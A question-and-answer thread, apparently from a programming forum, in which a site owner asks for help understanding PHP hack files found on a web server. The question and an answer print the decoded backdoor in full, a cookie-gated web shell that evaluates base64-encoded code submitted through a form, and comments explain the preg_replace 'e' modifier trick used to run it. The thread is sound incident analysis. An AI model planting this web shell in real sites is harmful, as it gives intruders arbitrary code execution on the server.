# PHP hack files found - help decoding and identifying

Tags: php

I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like:

```
if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;}
```

But this chunk (decoded above) is usually embedded into a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704

I can sort of see where this code is going, but definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden would be super helpful and greatly appreciated.

I tried to Google parts of the code, to see if others have reported it, but only came up with this link: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla

Thanks!

Answer (score 3):

If the cookie "v" is set to "d", display a textarea in a form. When the form is submitted, execute the code in the textarea.

```
<?php
if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){
    if (!empty($_POST['c'])) {
        echo '<textarea rows=28 cols=80>';
        $d=base64_decode(str_replace(' ','+',$_POST['c']));
        if($d)
            @eval($d);
        echo '</textarea>';
    }
    echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';
    exit;
}
?>
```

Comment: Spot on. It's giving somebody a textarea form field on your site, which allows them to execute arbitrary PHP code when the form has been submitted. All they have to do is type/paste the code into the textarea and submit.

Comment: Yes, that's what I see in the de-obfuscated code that I pasted in my post above. Thanks for the explication. If you look at the Pastie link, you'll see that this is a part of a preg_replace statement, and I'm wondering what the whole thing is doing.

Comment: The preg_replace does nothing useful, other than replace the string 'tmsqyhxndrp' with the PHP code. Perhaps it's just there as an extra layer of (useless) obfuscation?

Comment: It doesn't appear the `preg_replace` does anything explicit. As I believe you've already figured out, the `str_replace` chunk [decodes to this](http://pastie.org/private/z9ngbqmsezf8w79fbwjmq). Perhaps `preg_replace` is executing it for some reason?

Comment: `preg_replace` with the `e` modifier causes the `str_replace`d string to be evaluated as PHP code.

Comment: That explains a bit more. I even looked up the e flag and missed that -_-'.

Answer (score 0):

Not this specific hack, but some suggestions in [this post](https://stackoverflow.com/questions/9784682/virus-malware-modifying-htaccess-on-joomla-cms-website/9788895#9788895) might be helpful. Specifically, access logs might show you where the problem originated from.